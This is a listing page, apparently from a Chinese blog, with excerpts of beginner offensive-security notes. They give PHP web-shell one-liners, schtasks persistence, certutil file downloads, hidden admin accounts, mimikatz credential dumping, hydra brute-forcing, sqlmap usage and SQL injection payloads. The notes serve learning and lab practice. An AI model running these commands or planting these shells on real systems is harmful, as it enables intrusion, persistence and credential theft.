摘要: 新手入门,用来记一些笔记,大佬别喷。下面记录几个PHP里面可以执行系统命令的函数。 system() <?php $a = $_GET['cmd']; system($a); ?> exec() <?php $a = $_GET['cmd']; echo exec($a); ?> passthru( 阅读全文
posted @ 2020-02-07 20:39 BuFFERer 阅读(396) 评论(0) 推荐(0) 编辑
摘要: 今天西南民大的老哥,发我一道i春秋上的题,题目名字over the hill,然后就有了这篇,也是第一篇。 先介绍一下hill,Hill 密码是一种多字母代替密码。Hill 密码要求首先将明文分成同等规模的若干个分组(最后一个分组不足时需要填充),每一个分组被整体加密变换,即 Hill 密码属于分组 阅读全文
posted @ 2020-02-07 20:37 BuFFERer 阅读(308) 评论(0) 推荐(0) 编辑
摘要: schtasks 例子1: schtasks /create /tn "123" /tr "calc.exe" /sc onlogon 创建一个名字是123的计划任务,在每次管理员登录时,启动计算器。 例子2: schtasks /Create /TN 123 /SC DAILY /ST 01:02 阅读全文
posted @ 2020-02-07 17:13 BuFFERer 阅读(126) 评论(0) 推荐(0) 编辑
摘要: certutil.exe 这里用虚拟机开一个网站(http://192.168.3.128),假设外网网站,用本机(192.168.3.1) 来实验。 下载 certutil -urlcache -split -f 文件链接 自定义文件名 下载完之后会有一个缓存,删除缓存 certutil -url 阅读全文
posted @ 2020-02-07 17:12 BuFFERer 阅读(493) 评论(0) 推荐(0) 编辑
摘要: 实验环境:windwos server 2003 一般windwos下新建用户并加到管理员组: net user test /add net localgroup adminitrators test /add 这种情况下直接cmd下执行net user就会被看到新建的用户,比较容易被发现。 简单的 阅读全文
posted @ 2020-02-07 17:10 BuFFERer 阅读(645) 评论(0) 推荐(1) 编辑
摘要: 目标机 windows server 2008 R2 第一种方法: cmd下运行mimikatz.exe,然后依次输入下面命令 privilege::debug sekurlsa::logonpasswords 成功抓到服务器密码 第二种方法: 下载个procdump,https://docs.mi 阅读全文
posted @ 2020-02-07 17:08 BuFFERer 阅读(1571) 评论(0) 推荐(0) 编辑
摘要: hydra 暴力破解工具,可爆破很多服务,例如开机用户名密码 1、破解ssh: hydra -l 用户名 -P 密码字典 -t 线程 -vV -e ns ip ssh hydra -l 用户名 -P 密码字典 -t 线程 -o save.log -vV ip ssh 2、破解ftp: hydra i 阅读全文
posted @ 2020-02-07 17:06 BuFFERer 阅读(254) 评论(0) 推荐(0) 编辑
摘要: GET注入 sqlmap.py -u "url" 检测存在不存在注入 sqlmap.py -u "url" --tables 列出数据库的表 sqlmap.py -u "url" --columns -T admin 列出admin的内容 sqlmap.py -u "url" --dump -T a 阅读全文
posted @ 2020-02-07 17:05 BuFFERer 阅读(380) 评论(0) 推荐(0) 编辑
摘要: 二次注入原理 二次注入可以理解成,攻击者先将攻击语句插入到数据库中,然后再调用攻击语句,完成攻击。 下面自己搭建环境复现一下 先在reg,php去插入攻击语句,username处语句为' union select 1,user(),3# (这里后面的数字只要小于等于列数 就可以,因为reg.php中 阅读全文
posted @ 2020-02-07 17:03 BuFFERer 阅读(903) 评论(0) 推荐(0) 编辑
摘要: 宽字节注入原理 当数据库编码方式为gdk时,一个汉字会占用两个字节,平常字符会占一个字节 例如:你 url编码之后为 => %c4%e3 # url编码之后为 => %23 ' url编码之后为 => %27 \ url编码之后为 => %5c addslashes函数防止sql注入,将传入参数值进 阅读全文
posted @ 2020-02-07 17:00 BuFFERer 阅读(566) 评论(0) 推荐(0) 编辑